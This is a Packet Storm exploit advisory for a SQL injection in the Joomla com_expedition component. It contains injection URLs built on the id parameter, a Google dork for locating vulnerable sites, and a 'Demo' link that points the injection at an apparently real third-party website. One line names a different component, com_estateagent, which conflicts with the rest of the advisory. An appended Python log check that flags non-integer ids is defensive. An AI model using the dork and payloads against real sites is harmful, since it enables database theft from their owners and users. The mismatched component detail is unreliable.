Joomla Expedition SQL Injection

2011-10-09T00:00:00
ID PACKETSTORM:105635
Type packetstorm
Reporter BHG Security Center
Modified 2011-10-09T00:00:00

Description

                                        
                                            `=====================================================================  
  
>> Exploit database separated by exploit  
  
[+] Site : 1337db.com   
[+] Support e-mail : submit[at]1337db.com   
  
#########################################   
I'm Net.Edit0r 1337 Member from 1337 DataBase   
#########################################   
======================================================================  
####  
# Exploit Title: Joomla Component (com_expedition) <= SQL Injection Vulnerability   
# Author: BHG Security Center  
# Date: 2011-10-09  
# Vendor: N/A  
# E-mail: Net.Edit0r@att.net | black.hat.tm@gmail.com  
# Website: www.black-hg.org  
# Google Dork: inurl:index.php?option=com_expedition  
# Category: Webapps  
# Tested on: [Windows Vista Edition Intégral- French]  
# http://demo15.joomlaapps.com/  
####  
  
  
[*] ExpLo!T :  
  
http://127.0.0.1/index.php?option=com_expedition&task=detail&id=-3235'  
  
http://127.0.0.1/index.php?option=com_expedition&task=detail&id=[SQLi]  
  
http://127.0.0.1/path/index.php?option=com_expedition&task=detail&id=[SQLi]  
  
[*] Demo : http://www.astrobio.net/index.php?option=com_expedition&task=detail&id=-3235  
  
####  
  
[+] Peace From Algeria  
  
Vuln Component : com_estateagent   
  
Error in file Joomla Component (com_estateagent) SQL Injection  
  
A vulnerable parameter $ detail&id=  
  
####  
  
=================================**BHG Security Center**=====================================|  
# Greets To : |  
|  
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili |  
cmaxx M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y |  
THANKS TO ALL Iranian HackerZ | |  
============================================================================================ |  
`
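
Added example (not part of the original advisory): a log check that flags requests to the com_expedition detail task whose id parameter is not a plain integer, which is the parameter the advisory names. It assumes combined-format access logs and that legitimate ids are unsigned integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate record id is a short unsigned integer
VALID_ID_RE = re.compile(r"\d{1,10}")

def suspicious_id(target):
    """Return the offending id value when the request targets
    option=com_expedition&task=detail with a non-integer id, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # PHP keeps the last value of a repeated parameter
    if query.get("option", [""])[-1].lower() != "com_expedition":
        return None
    if query.get("task", [""])[-1].lower() != "detail":
        return None
    # Check every id value so a repeated parameter cannot hide a bad one
    for value in query.get("id", []):
        if not VALID_ID_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line number, client address, decoded id) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_id(match.group(1))
        if bad is not None:
            hits.append((number, line.split()[0], bad))
    return hits

# Constructed sample log lines (documentation address ranges)
SAMPLE_LOG = """
192.0.2.10 - - [09/Oct/2011:10:00:01 +0000] "GET /index.php?option=com_expedition&task=detail&id=12 HTTP/1.1" 200 5120
198.51.100.7 - - [09/Oct/2011:10:00:05 +0000] "GET /index.php?option=com_expedition&task=detail&id=-3235' HTTP/1.1" 500 312
198.51.100.7 - - [09/Oct/2011:10:00:06 +0000] "GET /path/index.php?option=com_expedition&task=detail&id=-3235%27 HTTP/1.1" 500 312
192.0.2.10 - - [09/Oct/2011:10:00:09 +0000] "GET /index.php?option=com_content&view=article&id=7:about HTTP/1.1" 200 800
""".strip().splitlines()

if __name__ == "__main__":
    for number, client, value in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-integer id {value!r}")
```

The same integer-only rule is the fix on the server side: cast or validate id as an integer before it reaches the query.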